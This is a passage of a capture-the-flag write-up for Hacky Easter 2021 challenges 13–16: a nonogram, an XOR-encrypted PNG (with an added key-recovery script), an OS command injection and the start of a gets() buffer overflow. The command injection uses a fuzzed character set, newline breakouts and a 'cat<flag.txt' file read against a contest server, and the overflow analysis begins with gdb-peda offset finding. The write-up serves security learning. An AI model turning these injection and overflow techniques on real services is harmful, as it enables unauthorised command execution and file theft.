class=\"hl\">he2021{4Ns1MG1k}<\/span>.\r\n\r\n<\/p>\r\n\r\n\r\n\r\n<hr\/>\r\n<h1 id=\"he21_13\">HE21.13 No No No<\/h1>\r\n<table class=\"tblChlg\"><tr>\r\n<td width=\"300px\"><img src =\"wp-content\/uploads\/2021\/04\/challenge13.jpg\" width=\"300px\"\/><\/td>\r\n<td valign=\"top\">\r\n<table class=\"tblChlgInner\">\r\n<tr><td>Level:<\/td><td><span class=\"easy\">4 (easy)<\/span><\/td><\/tr>\r\n<tr><td>Category:<\/td><td>Misc<\/td><\/tr>\r\n<tr><td>Points:<\/td><td>100<\/td><\/tr>\r\n<tr><td>Author:<\/td><td>khae<\/td><\/tr>\r\n<\/table>\r\n<\/td><\/tr>\r\n<tr><td colspan=\"2\">\r\n<pre>\r\nNo! No... nono ..\r\n\r\nWhere's the egg???\r\n\r\n<img decoding=\"async\" src=\"wp-content\/uploads\/2021\/04\/he21_13_01.png\" width=\"500px\"\/>\r\n\r\n<b>Hint<\/b>\r\n\r\n- Using a tool might be a good idea here.\r\n- There is a small glitch - if you don't get a solution, try something else.\r\n<\/pre>\r\n<\/td><\/tr>\r\n<\/table>\r\n\r\n<p>\r\nUsing <a href=\"http:\/\/a.teall.info\/nonogram\/\" rel=\"noopener noreferrer\" target=\"_blank\">this nice online solver<\/a> the greatest challenge was to write down the values from the image:\r\n<\/p>\r\n\r\n<p>\r\n<img decoding=\"async\" src=\"wp-content\/uploads\/2021\/04\/he21_13_02.png\" alt=\"Solved\"\/>\r\n<\/p>\r\n\r\n<p>\r\nThe flag is <span class=\"hl\">he2021{Y3sY3sY3sgram_s0unds_a_l0t_nic3r}<\/span>.\r\n\r\n<\/p>\r\n\r\n\r\n\r\n<hr\/>\r\n<h1 id=\"he21_14\">HE21.14 Haxxor what?<\/h1>\r\n<table class=\"tblChlg\"><tr>\r\n<td width=\"300px\"><img src =\"wp-content\/uploads\/2021\/04\/challenge14.jpg\" width=\"300px\"\/><\/td>\r\n<td valign=\"top\">\r\n<table class=\"tblChlgInner\">\r\n<tr><td>Level:<\/td><td><span class=\"easy\">4 (easy)<\/span><\/td><\/tr>\r\n<tr><td>Category:<\/td><td>Crypto<\/td><\/tr>\r\n<tr><td>Points:<\/td><td>100<\/td><\/tr>\r\n<tr><td>Author:<\/td><td>PS<\/td><\/tr>\r\n<\/table>\r\n<\/td><\/tr>\r\n<tr><td colspan=\"2\">\r\n<pre>\r\nI got this image of an Easter egg.\r\n\r\nBut what kind of encryption 
is this?!\r\n\r\n<span class=\"fake_link\">haxxorwhat<\/span>\r\n\r\n<b>Hint<\/b>\r\n\r\nThe original file is an image.\r\n<\/pre>\r\n<\/td><\/tr>\r\n<\/table>\r\n\r\n<p>\r\nAccording to <span class=\"hl\">file<\/span> the provided file is just <span class=\"hl\">data<\/span>:\r\n<\/p>\r\n\r\n<p>\r\n<code>\r\n\u250c\u2500\u2500(kali\u327fkali)-[~\/ctf\/he21\/14]\r\n\u2514\u2500$ file haxxorwhat \r\nhaxxorwhat: data\r\n<\/code>\r\n<\/p>\r\n\r\n<p>\r\n<span class=\"hl\">hexdump<\/span> does not show anything obviously meaningful either, but fragments like <span class=\"hl\">ax<\/span>, <span class=\"hl\">rs<\/span> and <span class=\"hl\">ha|xorw!<\/span> keep reappearing at the same positions within each 8-byte group. That is typical for a short repeating XOR key: wherever the plaintext contains <span class=\"hl\">0x00<\/span> bytes (and a PNG header has plenty of them), the key bytes leak through unchanged:\r\n<\/p>\r\n\r\n<p>\r\n<code>\r\n\u250c\u2500\u2500(kali\u327fkali)-[~\/ctf\/he21\/14]\r\n\u2514\u2500$ hexdump -C haxxorwhat\r\n00000000  e1 31 36 3f 62 78 69 2b  68 61 78 75 26 3a 37 73  |.16?bxi+haxu&:7s|\r\n00000010  68 61 7c 78 6f 72 77 21  60 62 78 78 6f 3a b0 fa  |ha|xorw!&#x60;bxxo:..|\r\n00000020  d9 61 78 78 6b 15 32 6c  29 61 78 c9 e0 79 8f 40  |.axxk.2l)ax..y.@|\r\n00000030  6d 61 78 78 4f 11 3b 73  25 61 78 02 49 72 73 a1  |maxxO.;s%ax.Irs.|\r\n00000040  ec 61 78 82 6f 72 73 a1  80 61 78 0d 5f 72 73 cb  |.ax.ors..ax._rs.|\r\n00000050  08 61 78 42 f7 72 73 36  18 fd c2 29 53 72 73 23  |.axB.rs6...)Srs#|\r\n00000060  4a 31 34 2c 2a 35 03 6d  68 61 78 7a 6d 70 77 24  |J14,*5.mhaxzmpw$|\r\n00000070  6e 69 72 73 62 62 61 32  70 7b 61 67 4d 6d 54 0a  |nirsbba2p{agMmT.|\r\n00000080  4d 4e 4b 53 59 49 73 21  68 51 44 3a 4b 34 41 0f  |MNKSYIs!hQD:K4A.|\r\n00000090  3c 5a 42 1f 28 34 0b 73  3c ef 19 1b cc 1c 03 99  |&lt;ZB.(4.s&lt;.......|\r\n...\r\n<\/code>\r\n<\/p>\r\n\r\n<p>\r\nBoth the challenge name and the file name contain <span class=\"hl\">xor<\/span>, and the hint says the file is an image.\r\n<\/p>\r\n\r\n<p>\r\nAssuming the image is a PNG, its first bytes are constant (the 8-byte signature followed by the length and type of the IHDR chunk). Thus we can take any PNG (e.g. the egg from challenge 10) and XOR its header with the beginning of the file <span class=\"hl\">haxxorwhat<\/span>. 
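As an added example (my own code, not the writeup's), here is the known-plaintext recovery as a stand-alone script. It uses only the constant PNG signature and IHDR chunk header as plaintext, so no second image is needed, derives the key length from where the keystream starts to repeat and verifies the result by parsing the IHDR chunk. The 32 bytes in SAMPLE_CT are the first two rows of the hexdump above; the period detection and the IHDR check are my additions and assume the key is at most 16 bytes long.

```python
#!/usr/bin/env python3
"""Recover a repeating XOR key from a PNG by known plaintext, then decrypt.

Added example for the haxxorwhat challenge, not the writeup's own script.
The first 16 bytes of every PNG are fixed (8-byte signature, IHDR length
13, chunk type "IHDR"), so XORing them against the ciphertext yields 16
bytes of keystream.  The key period is read off that keystream, which
assumes the key is at most 16 bytes long; a longer key needs more known
plaintext (e.g. predictable IHDR fields such as bit depth).
"""
import struct
import sys

# Constant prefix of every PNG file: signature, IHDR length (13), "IHDR".
PNG_KNOWN_PREFIX = b"\x89PNG\r\n\x1a\n" + b"\x00\x00\x00\x0d" + b"IHDR"

# First 32 bytes of haxxorwhat, copied from the hexdump in the writeup.
SAMPLE_CT = bytes.fromhex(
    "e131363f6278692b68617875263a3773"
    "68617c786f727721606278786f3ab0fa"
)


def xor_with_key(data: bytes, key: bytes) -> bytes:
    """XOR data with a repeating key; the same call encrypts and decrypts."""
    if not key:
        raise ValueError("empty key")
    return bytes(c ^ key[i % len(key)] for i, c in enumerate(data))


def shortest_period(stream: bytes) -> int:
    """Smallest p with stream[i] == stream[i % p] for every i.

    Returns len(stream) when no repetition is visible, i.e. the known
    plaintext was too short to see the key wrap around.
    """
    for p in range(1, len(stream)):
        if all(stream[i] == stream[i % p] for i in range(len(stream))):
            return p
    return len(stream)


def recover_key(ct: bytes, known: bytes = PNG_KNOWN_PREFIX) -> bytes:
    """Known-plaintext attack: keystream = ct XOR known, key = one period."""
    if len(ct) < len(known):
        raise ValueError("ciphertext shorter than known plaintext")
    keystream = bytes(c ^ p for c, p in zip(ct, known))
    return keystream[: shortest_period(keystream)]


def parse_ihdr(png: bytes):
    """Return (width, height, bit_depth, colour_type) of a decrypted PNG."""
    if not png.startswith(PNG_KNOWN_PREFIX):
        raise ValueError("not a PNG")
    return struct.unpack(">IIBB", png[16:26])


def crack(ct: bytes):
    """Recover the key, decrypt, and sanity-check the IHDR chunk."""
    key = recover_key(ct)
    pt = xor_with_key(ct, key)
    return key, pt, parse_ihdr(pt)


if __name__ == "__main__":
    # With a path argument the real file is decrypted and written to "out";
    # without one the embedded sample is used.
    if len(sys.argv) > 1:
        with open(sys.argv[1], "rb") as f:
            ct = f.read()
    else:
        ct = SAMPLE_CT
    key, pt, (w, h, depth, ctype) = crack(ct)
    print(f"key={key!r} image={w}x{h} bit_depth={depth} colour_type={ctype}")
    if len(sys.argv) > 1:
        with open("out", "wb") as f:
            f.write(pt)
```

Run without arguments it reports the key haxxors! and a 1024 x 1024 image with bit depth 8 and colour type 3 (palette), which is exactly what file prints for the decrypted egg further down; with the path to haxxorwhat as argument it writes the decrypted PNG to out.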
The result of this is the XOR key used:\r\n<\/p>\r\n\r\n<p>\r\n<code>\r\n&gt;&gt;&gt; ct1 = open('haxxorwhat','rb').read()\r\n&gt;&gt;&gt; ct2 = open('..\/10\/flag','rb').read()\r\n&gt;&gt;&gt; r = b''\r\n&gt;&gt;&gt; for i in range(16):\r\n...   r += bytes([ct1[i]^ct2[i]])\r\n... \r\n&gt;&gt;&gt; r\r\nb'haxxors!haxxors!'\r\n<\/code>\r\n<\/p>\r\n\r\n<p>\r\nThe 16-byte keystream repeats after 8 bytes, so the key is <span class=\"hl\">haxxors!<\/span>.\r\n<\/p>\r\n\r\n<p>\r\nNow we only need to apply this key to the whole file. XOR is its own inverse, so the operation that encrypted the image also decrypts it; the following script does that:\r\n<\/p>\r\n\r\n<p>\r\n<code>\r\n#!\/usr\/bin\/env python3\r\n\r\n# repeating-key XOR: key byte i % len(key) is applied to ciphertext byte i\r\nkey = b'haxxors!'\r\n\r\nct = open('haxxorwhat', 'rb').read()\r\n\r\nr = bytes(c ^ key[i % len(key)] for i, c in enumerate(ct))\r\n\r\nwith open('out', 'wb') as f:\r\n  f.write(r)\r\n<\/code>\r\n<\/p>\r\n\r\n<p>\r\nRunning the script creates the output file <span class=\"hl\">out<\/span>, which <span class=\"hl\">file<\/span> now identifies as a PNG, confirming the key:\r\n<\/p>\r\n\r\n<p>\r\n<code>\r\n\u250c\u2500\u2500(kali\u327fkali)-[~\/ctf\/he21\/14]\r\n\u2514\u2500$ .\/crax0r.py                 \r\n\r\n\u250c\u2500\u2500(kali\u327fkali)-[~\/ctf\/he21\/14]\r\n\u2514\u2500$ file out       \r\nout: PNG image data, 1024 x 1024, 8-bit colormap, non-interlaced\r\n<\/code>\r\n<\/p>\r\n\r\n<p>\r\nThis is actually the egg:\r\n<\/p>\r\n\r\n<p>\r\n<img decoding=\"async\" src=\"wp-content\/uploads\/2021\/04\/he21_14_01.png\" alt=\"Egg\"\/>\r\n<\/p>\r\n\r\n<p>\r\nNow we only need to scan the QR code:\r\n<\/p>\r\n\r\n<p>\r\n<code>\r\n\u250c\u2500\u2500(kali\u327fkali)-[~\/ctf\/he21\/14]\r\n\u2514\u2500$ zbarimg out           \r\nQR-Code:he2021{r34l_x0r_h4xx0r}\r\nscanned 1 barcode symbols from 1 images in 0.08 seconds\r\n<\/code>\r\n<\/p>\r\n\r\n<p>\r\nThe flag is <span class=\"hl\">he2021{r34l_x0r_h4xx0r}<\/span>.\r\n\r\n<\/p>\r\n\r\n\r\n\r\n<hr\/>\r\n<h1 id=\"he21_15\">HE21.15 Social Checker<\/h1>\r\n<table class=\"tblChlg\"><tr>\r\n<td width=\"300px\"><img src 
=\"wp-content\/uploads\/2021\/04\/challenge15.jpg\" width=\"300px\"\/><\/td>\r\n<td valign=\"top\">\r\n<table class=\"tblChlgInner\">\r\n<tr><td>Level:<\/td><td><span class=\"medium\">5 (medium)<\/span><\/td><\/tr>\r\n<tr><td>Category:<\/td><td>Web<\/td><\/tr>\r\n<tr><td>Points:<\/td><td>200<\/td><\/tr>\r\n<tr><td>Author:<\/td><td>PS<\/td><\/tr>\r\n<\/table>\r\n<\/td><\/tr>\r\n<tr><td colspan=\"2\">\r\n<pre>\r\nSocial Checker - check if your favourite social media site is online!\r\n\r\n<span class=\"fake_link\">http:\/\/46.101.107.117:2103<\/span>\r\n\r\nNote: The service is restarted every hour at x:00.\r\n\r\n<b>Hint<\/b>\r\n\r\nSome characters are blocked - find a workaround!\r\n<\/pre>\r\n<\/td><\/tr>\r\n<\/table>\r\n\r\n<p>\r\nThe provided website can be used to check if a given social media site is online:\r\n<\/p>\r\n\r\n<p>\r\n<img decoding=\"async\" src=\"wp-content\/uploads\/2021\/04\/he21_15_01.png\" alt=\"Website\"\/>\r\n<\/p>\r\n\r\n<p>\r\nWithin an unmodified request the POST parameter <span class=\"hl\">url<\/span> is set to the social media site (e.g. <span class=\"hl\">twitter.com<\/span>). The result contains the name of the requested website (<span class=\"hl\">twitter.com<\/span>), its ip address and port (<span class=\"hl\">104.244.42.193:80<\/span>) as well as the status (<span class=\"hl\">open<\/span>):\r\n<\/p>\r\n\r\n<p>\r\n<img decoding=\"async\" src=\"wp-content\/uploads\/2021\/04\/he21_15_02.png\" alt=\"Website\"\/>\r\n<\/p>\r\n\r\n<p>\r\nLet&#8217;s start by changing the <span class=\"hl\">url<\/span> to target <span class=\"hl\">localhost<\/span>:\r\n<\/p>\r\n\r\n<p>\r\n<img decoding=\"async\" src=\"wp-content\/uploads\/2021\/04\/he21_15_03.png\" alt=\"Website\"\/>\r\n<\/p>\r\n\r\n<p>\r\nThis works. 
Next, let&#8217;s try a simple command injection:\r\n<\/p>\r\n\r\n<p>\r\n<img decoding=\"async\" src=\"wp-content\/uploads\/2021\/04\/he21_15_04.png\" alt=\"Website\"\/>\r\n<\/p>\r\n\r\n<p>\r\nObviously some kind of filter is in place.\r\n<\/p>\r\n\r\n<p>\r\nWhen we provide an invalid port number, the error message of <span class=\"hl\">nc<\/span> shows up, which tells us that the check is implemented by invoking an OS command with our input:\r\n<\/p>\r\n\r\n<p>\r\n<img decoding=\"async\" src=\"wp-content\/uploads\/2021\/04\/he21_15_05.png\" alt=\"Website\"\/>\r\n<\/p>\r\n\r\n<p>\r\nIn order to find characters that are not filtered and could be used for a command injection, we fuzz the service with <span class=\"hl\">ffuf<\/span>. The wordlist (<span class=\"hl\">URI-hex.txt<\/span>) contains all 256 possible byte values, URL encoded: <span class=\"hl\">%00<\/span>, <span class=\"hl\">%01<\/span>, &#8230; <span class=\"hl\">%ff<\/span>. Most characters produce the same response of size <span class=\"hl\">29<\/span>, so we drop those with <span class=\"hl\">-fs 29<\/span> and only look at the ones that behave differently:\r\n<\/p>\r\n\r\n<p>\r\n<code>\r\n\u250c\u2500\u2500(kali\u327fkali)-[~\/ctf\/he21\/15]\r\n\u2514\u2500$ ffuf -w \/usr\/share\/wordlists\/SecLists\/Fuzzing\/URI-hex.txt -u http:\/\/46.101.107.117:2103\/check.php -d 'url=127.0.0.1FUZZ' -H 'Content-Type: application\/x-www-form-urlencoded; charset=UTF-8' -fs 29\r\n\r\n        \/'___\\  \/'___\\           \/'___\\       \r\n       \/\\ \\__\/ \/\\ \\__\/  __  __  \/\\ \\__\/       \r\n       \\ \\ ,__\\\\ \\ ,__\\\/\\ \\\/\\ \\ \\ \\ ,__\\      \r\n        \\ \\ \\_\/ \\ \\ \\_\/\\ \\ \\_\\ \\ \\ \\ \\_\/      \r\n         \\ \\_\\   \\ \\_\\  \\ \\____\/  \\ \\_\\       \r\n          \\\/_\/    \\\/_\/   \\\/___\/    \\\/_\/       \r\n\r\n       v1.1.0\r\n________________________________________________\r\n\r\n :: Method           : POST\r\n :: URL              : http:\/\/46.101.107.117:2103\/check.php\r\n :: Wordlist         : FUZZ: \/usr\/share\/wordlists\/SecLists\/Fuzzing\/URI-hex.txt\r\n :: Header  
         : Content-Type: application\/x-www-form-urlencoded; charset=UTF-8\r\n :: Data             : url=127.0.0.1FUZZ\r\n :: Follow redirects : false\r\n :: Calibration      : false\r\n :: Timeout          : 10\r\n :: Threads          : 40\r\n :: Matcher          : Response status: 200,204,301,302,307,401,403\r\n :: Filter           : Response size: 29\r\n________________________________________________\r\n\r\n%27                     [Status: 200, Size: 0, Words: 1, Lines: 1]\r\n%00                     [Status: 200, Size: 0, Words: 1, Lines: 1]\r\n%20                     [Status: 200, Size: 46, Words: 4, Lines: 1]\r\n%09                     [Status: 200, Size: 30, Words: 3, Lines: 2]\r\n%29                     [Status: 200, Size: 0, Words: 1, Lines: 1]\r\n%22                     [Status: 200, Size: 0, Words: 1, Lines: 1]\r\n%28                     [Status: 200, Size: 0, Words: 1, Lines: 1]\r\n%0a                     [Status: 200, Size: 18, Words: 4, Lines: 2]\r\n%30                     [Status: 200, Size: 32, Words: 3, Lines: 2]\r\n%26                     [Status: 200, Size: 18, Words: 4, Lines: 2]\r\n%3a                     [Status: 200, Size: 31, Words: 5, Lines: 2]\r\n%39                     [Status: 200, Size: 32, Words: 3, Lines: 2]\r\n%33                     [Status: 200, Size: 32, Words: 3, Lines: 2]\r\n%3b                     [Status: 200, Size: 46, Words: 4, Lines: 1]\r\n%35                     [Status: 200, Size: 32, Words: 3, Lines: 2]\r\n%37                     [Status: 200, Size: 32, Words: 3, Lines: 2]\r\n%32                     [Status: 200, Size: 32, Words: 3, Lines: 2]\r\n%34                     [Status: 200, Size: 32, Words: 3, Lines: 2]\r\n%38                     [Status: 200, Size: 32, Words: 3, Lines: 2]\r\n%31                     [Status: 200, Size: 32, Words: 3, Lines: 2]\r\n%36                     [Status: 200, Size: 32, Words: 3, Lines: 2]\r\n%3e                     [Status: 200, Size: 0, Words: 1, Lines: 1]\r\n%3c                     
[Status: 200, Size: 0, Words: 1, Lines: 1]\r\n%60                     [Status: 200, Size: 0, Words: 1, Lines: 1]\r\n%7c                     [Status: 200, Size: 18, Words: 4, Lines: 2]\r\n%5c                     [Status: 200, Size: 31, Words: 5, Lines: 2]\r\n:: Progress: [256\/256] :: Job [1\/1] :: 51 req\/sec :: Duration: [0:00:05] :: Errors: 0 ::\r\n<\/code>\r\n<\/p>\r\n\r\n<p>\r\nNow we have a handful of characters that produce a different response: quotes, backticks, parentheses, <span class=\"hl\">&lt;<\/span>, <span class=\"hl\">&gt;<\/span>, <span class=\"hl\">|<\/span>, <span class=\"hl\">&amp;<\/span>, <span class=\"hl\">;<\/span>, whitespace and the newline <span class=\"hl\">%0a<\/span>.\r\n<\/p>\r\n\r\n<p>\r\nBy using <span class=\"hl\">%0a<\/span> we get an error message from <span class=\"hl\">sh<\/span>, which complains that the command <span class=\"hl\">80<\/span> is unknown: the newline terminates the <span class=\"hl\">nc<\/span> command, so the shell treats whatever the application appends after our input as a separate command:\r\n<\/p>\r\n\r\n<p>\r\n<img decoding=\"async\" src=\"wp-content\/uploads\/2021\/04\/he21_15_06.png\" alt=\"Website\"\/>\r\n<\/p>\r\n\r\n<p>\r\nObviously the injection point looks something like this (according to the <span class=\"hl\">X-Powered-By<\/span> header we are dealing with <span class=\"hl\">php<\/span>):\r\n<\/p>\r\n\r\n<p>\r\n<code>\r\nsystem(\"nc \".$_POST['url'].\":80\")\r\n<\/code>\r\n<\/p>\r\n\r\n<p>\r\nThus we can run a command of our own by wrapping it in two <span class=\"hl\">%0a<\/span>: the first one terminates the <span class=\"hl\">nc<\/span> command, the second one separates our command from the appended port:\r\n<\/p>\r\n\r\n<p>\r\n<img decoding=\"async\" src=\"wp-content\/uploads\/2021\/04\/he21_15_07.png\" alt=\"Website\"\/>\r\n<\/p>\r\n\r\n<p>\r\nUsing <span class=\"hl\">ls<\/span> we can see that there is a file called <span class=\"hl\">flag.txt<\/span>:\r\n<\/p>\r\n\r\n<p>\r\n<img decoding=\"async\" src=\"wp-content\/uploads\/2021\/04\/he21_15_08.png\" alt=\"Website\"\/>\r\n<\/p>\r\n\r\n<p>\r\nA space, however, is rejected:\r\n<\/p>\r\n\r\n<p>\r\n<img decoding=\"async\" src=\"wp-content\/uploads\/2021\/04\/he21_15_09.png\" alt=\"Website\"\/>\r\n<\/p>\r\n\r\n<p>\r\nUsing <span class=\"hl\">&lt;<\/span> to feed <span class=\"hl\">flag.txt<\/span> to <span class=\"hl\">cat<\/span> on stdin avoids the space entirely (<span class=\"hl\">cat&lt;flag.txt<\/span> is a valid command line for <span class=\"hl\">sh<\/span>):\r\n<\/p>\r\n\r\n<p>\r\n<img decoding=\"async\" 
src=\"wp-content\/uploads\/2021\/04\/he21_15_10.png\" alt=\"Website\"\/>\r\n<\/p>\r\n\r\n<p>\r\nThe flag is <span class=\"hl\">he2021{1ts_fun_t0_1nj3kt_k0mmand5}<\/span>.\r\n\r\n<\/p>\r\n\r\n\r\n\r\n<hr\/>\r\n<h1 id=\"he21_16\">HE21.16 LOTL<\/h1>\r\n<table class=\"tblChlg\"><tr>\r\n<td width=\"300px\"><img src =\"wp-content\/uploads\/2021\/04\/challenge16.jpg\" width=\"300px\"\/><\/td>\r\n<td valign=\"top\">\r\n<table class=\"tblChlgInner\">\r\n<tr><td>Level:<\/td><td><span class=\"medium\">5 (medium)<\/span><\/td><\/tr>\r\n<tr><td>Category:<\/td><td>Pwn<\/td><\/tr>\r\n<tr><td>Points:<\/td><td>200<\/td><\/tr>\r\n<tr><td>Author:<\/td><td>daubsi<\/td><\/tr>\r\n<\/table>\r\n<\/td><\/tr>\r\n<tr><td colspan=\"2\">\r\n<pre>\r\nSave the planet!\r\n\r\nWell, we should then better LOTL and use what we have, right?\r\n\r\n<span class=\"hl\">nc 46.101.107.117 2102<\/span>\r\n\r\nGet a shell and read the flag.\r\n\r\nNote: The service is restarted every hour at x:00.\r\n\r\n<span class=\"fake_link\">lotl<\/span>\r\n\r\n<b>Hint<\/b>\r\n\r\nUbuntu 18.04 64 Bit\r\n<\/pre>\r\n<\/td><\/tr>\r\n<\/table>\r\n\r\n<p>\r\nThe provided file is a 64-bit ELF binary, which is dynamically linked, not stripped, without stack canaries, nx enabled, no pic and partial relro:\r\n<\/p>\r\n\r\n<p>\r\n<code>\r\n\u250c\u2500\u2500(kali\u327fkali)-[~\/ctf\/he21\/16]\r\n\u2514\u2500$ file lotl  \r\nlotl: <span class=\"hl2\">ELF 64-bit<\/span> LSB executable, x86-64, version 1 (SYSV), <span class=\"hl2\">dynamically linked<\/span>, interpreter \/lib64\/ld-linux-x86-64.so.2, for GNU\/Linux 3.2.0, BuildID[sha1]=05ea252a13b095c8275884ab0350d0f6848f4e9c, <span class=\"hl2\">not stripped<\/span>\r\n\r\n\u250c\u2500\u2500(kali\u327fkali)-[~\/ctf\/he21\/16]\r\n\u2514\u2500$ r2 -A lotl       \r\n[x] Analyze all flags starting with sym. 
and entry0 (aa)\r\n[x] Analyze function calls (aac)\r\n[x] Analyze len bytes of instructions for references (aar)\r\n[x] Check for objc references\r\n[x] Check for vtables\r\n[x] Type matching analysis for all functions (aaft)\r\n[x] Propagate noreturn information\r\n[x] Use -AA or aaaa to perform additional experimental analysis.\r\n[0x00400670]&gt; iI\r\narch     x86\r\nbaddr    0x400000\r\nbinsz    6985\r\nbintype  elf\r\nbits     64\r\n<span class=\"hl2\">canary   false<\/span>\r\nclass    ELF64\r\ncompiler GCC: (Ubuntu 7.5.0-3ubuntu1~18.04) 7.5.0\r\ncrypto   false\r\nendian   little\r\nhavecode true\r\nintrp    \/lib64\/ld-linux-x86-64.so.2\r\nladdr    0x0\r\nlang     c\r\nlinenum  true\r\nlsyms    true\r\nmachine  AMD x86-64 architecture\r\nmaxopsz  16\r\nminopsz  1\r\n<span class=\"hl2\">nx       true<\/span>\r\nos       linux\r\npcalign  0\r\n<span class=\"hl2\">pic      false<\/span>\r\nrelocs   true\r\n<span class=\"hl2\">relro    partial<\/span>\r\nrpath    NONE\r\nsanitiz  false\r\nstatic   false\r\nstripped false\r\nsubsys   linux\r\nva       true\r\n<\/code>\r\n<\/p>\r\n\r\n<p>\r\nWe can also see that there is a function called <span class=\"hl\">profit<\/span>, which spawns a shell:\r\n<\/p>\r\n\r\n<p>\r\n<code>\r\n[0x00400670]&gt; afl\r\n0x00400670    1 42           entry0\r\n0x004006b0    4 42   -&gt; 37   sym.deregister_tm_clones\r\n0x004006e0    4 58   -&gt; 55   sym.register_tm_clones\r\n0x00400720    3 34   -&gt; 29   entry.fini0\r\n0x00400750    1 7            entry.init0\r\n0x004008f0    1 2            sym.__libc_csu_fini\r\n0x00400757    1 97           sym.ignore_me_init_buffering\r\n0x00400660    1 6            sym.imp.setvbuf\r\n<span class=\"hl2\">0x0040086d    1 19           sym.profit<\/span>\r\n0x00400610    1 6            sym.imp.system\r\n0x004008f4    1 9            sym._fini\r\n0x004007b8    3 47           sym.kill_on_timeout\r\n0x00400620    1 6            sym.imp.printf\r\n0x00400600    1 6            sym.imp._exit\r\n0x00400880  
  4 101          sym.__libc_csu_init\r\n0x004006a0    1 2            sym._dl_relocate_static_pie\r\n0x00400809    1 100          main\r\n0x004007e7    1 34           sym.ignore_me_init_signal\r\n0x00400640    1 6            sym.imp.signal\r\n0x00400630    1 6            sym.imp.alarm\r\n0x00400650    1 6            sym.imp.gets\r\n0x004005d8    3 23           sym._init\r\n[0x00400670]&gt; pdf @ sym.profit \r\n\u250c 19: sym.profit ();\r\n\u2502           0x0040086d      55             push rbp\r\n\u2502           0x0040086e      4889e5         mov rbp, rsp\r\n\u2502           0x00400871      488d3d000100.  <span class=\"hl2\">lea rdi, qword str.bin_sh   ; 0x400978 ; \"\/bin\/sh\"<\/span> ; const char *string\r\n\u2502           0x00400878      e893fdffff     <span class=\"hl2\">call sym.imp.system<\/span>         ; int system(const char *string)\r\n\u2502           0x0040087d      90             nop\r\n\u2502           0x0040087e      5d             pop rbp\r\n\u2514           0x0040087f      c3             ret\r\n<\/code>\r\n<\/p>\r\n\r\n<p>\r\nWithin the <span class=\"hl\">main<\/span> function the unsafe function <span class=\"hl\">gets<\/span> is used, to read user input:\r\n<\/p>\r\n\r\n<p>\r\n<code>\r\n[0x00400670]&gt; pdf @ sym.main\r\n            ; DATA XREF from entry0 @ 0x40068d\r\n            \u250c 100: int main (int argc, char **argv);\r\n            \u2502           ; var char **var_30h @ rbp-0x30\r\n            \u2502           ; var int64_t var_24h @ rbp-0x24\r\n            \u2502           ; var char *s @ rbp-0x20\r\n            \u2502           ; arg int argc @ rdi\r\n            \u2502           ; arg char **argv @ rsi\r\n            \u2502           0x00400809      55             push rbp\r\n            \u2502           0x0040080a      4889e5         mov rbp, rsp\r\n            \u2502           0x0040080d      4883ec30       sub rsp, 0x30\r\n            \u2502           0x00400811      897ddc         mov dword [var_24h], edi    ; argc\r\n        
    \u2502           0x00400814      488975d0       mov qword [var_30h], rsi    ; argv\r\n            \u2502           0x00400818      b800000000     mov eax, 0\r\n            \u2502           0x0040081d      e835ffffff     call sym.ignore_me_init_buffering\r\n            \u2502           0x00400822      b800000000     mov eax, 0\r\n            \u2502           0x00400827      e8bbffffff     call sym.ignore_me_init_signal\r\n            \u2502           0x0040082c      488d3d050100.  lea rdi, qword str.Welcome__Please_give_me_your_name ; 0x400938 ; \"Welcome! Please give me your name!\\n&gt; \" ; const char *format\r\n            \u2502           0x00400833      b800000000     mov eax, 0\r\n            \u2502           0x00400838      e8e3fdffff     call sym.imp.printf         ; int printf(const char *format)\r\n            \u2502           0x0040083d      488d45e0       lea rax, qword [s]\r\n            \u2502           0x00400841      4889c7         mov rdi, rax                ; char *s\r\n            \u2502           0x00400844      b800000000     mov eax, 0\r\n            \u2502           0x00400849      e802feffff     <span class=\"hl2\">call sym.imp.gets<\/span>           ; char *gets(char *s)\r\n            \u2502           0x0040084e      488d45e0       lea rax, qword [s]\r\n            \u2502           0x00400852      4889c6         mov rsi, rax\r\n            \u2502           0x00400855      488d3d020100.  
lea rdi, qword str.Hi__s__nice_to_meet_you ; 0x40095e ; \"Hi %s, nice to meet you!\\n\" ; const char *format\r\n            \u2502           0x0040085c      b800000000     mov eax, 0\r\n            \u2502           0x00400861      e8bafdffff     call sym.imp.printf         ; int printf(const char *format)\r\n            \u2502           0x00400866      b800000000     mov eax, 0\r\n            \u2502           0x0040086b      c9             leave\r\n            \u2514           0x0040086c      c3             ret\r\n<\/code>\r\n<\/p>\r\n\r\n<p>\r\nSince <span class=\"hl\">gets<\/span> does not do any boundary checks and there are no canaries, this can be used to simply overwrite the return address on the stack in order to control the instruction pointer.\r\n<\/p>\r\n\r\n<p>\r\nAt first let&#8217;s determine the offset from the beginning of the buffer to the return address. We can for example use <span class=\"hl\">gdb-peda<\/span>:\r\n<\/p>\r\n\r\n<p>\r\n<code>\r\n\u250c\u2500\u2500(kali\u327fkali)-[~\/ctf\/he21\/16]\r\n\u2514\u2500$ gdb .\/lotl     \r\nReading symbols from .\/lotl...\r\n(No debugging symbols found in .\/lotl)\r\ngdb-peda$\r\n<\/code>\r\n<\/p>\r\n\r\n<p>\r\nUsing the <span class=\"hl\">pattern_create<\/span> command, we can generate a pattern of 200 bytes:\r\n<\/p>\r\n\r\n<p>\r\n<code>\r\ngdb-peda$ pattern_create 200 \/tmp\/pattern\r\nWriting pattern of 200 chars to filename \"\/tmp\/pattern\"\r\n<\/code>\r\n<\/p>\r\n\r\n<p>\r\nNow we run the program with the pattern:\r\n<\/p>\r\n\r\n<p>\r\n<code>\r\ngdb-peda$ <span class=\"hl2\">r < \/tmp\/pattern<\/span>\r\nStarting program: \/home\/kali\/ctf\/he21\/16\/lotl &lt; \/tmp\/pattern\r\nWelcome! 
